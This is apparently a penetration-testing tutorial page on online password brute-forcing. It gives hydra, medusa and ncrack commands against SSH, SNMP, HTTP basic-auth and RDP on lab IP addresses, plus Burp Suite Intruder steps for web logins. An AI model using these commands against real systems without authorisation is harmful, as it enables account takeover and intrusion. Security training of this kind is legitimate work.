Online password cracking#
There are several tools specialized for bruteforcing online. There are several different services that are common for bruteforce. For example: VNC, SSH, FTP, SNMP, POP3, HTTP.
Port 22 - SSH#
hydra -l root -P wordlist.txt 192.168.0.101 ssh
hydra -L userlist.txt -P best1050.txt 192.168.1.103 -s 22 ssh -V
Port 80/443 htaccess#
You can password protect directories with apache pretty easily. Just configure the htaccess (I exaplin this in the chapter on Common ports).
It can then be brute forced like this:
medusa -h 192.168.1.101 -u admin -P wordlist.txt -M http -m DIR:/test -T 10
Logins#
Use Burp suite.
- Intecept a login attempt.
- Right-lick "Send to intruder". Select Sniper if you have nly one field you want to bruteforce. If you for example already know the username. Otherwise select cluster-attack.
- Select your payload, your wordlist.
- Click attack.
- Look for response-length that differs from the rest.
Port 161 - SNMP#
hydra -P wordlist.txt -v 102.168.0.101 snmp
Port 3389 - Remote Desktop Protocol#
For RDP we can use Ncrack.
ncrack -vv --user admin -P password-file.txt rdp://192.168.0.101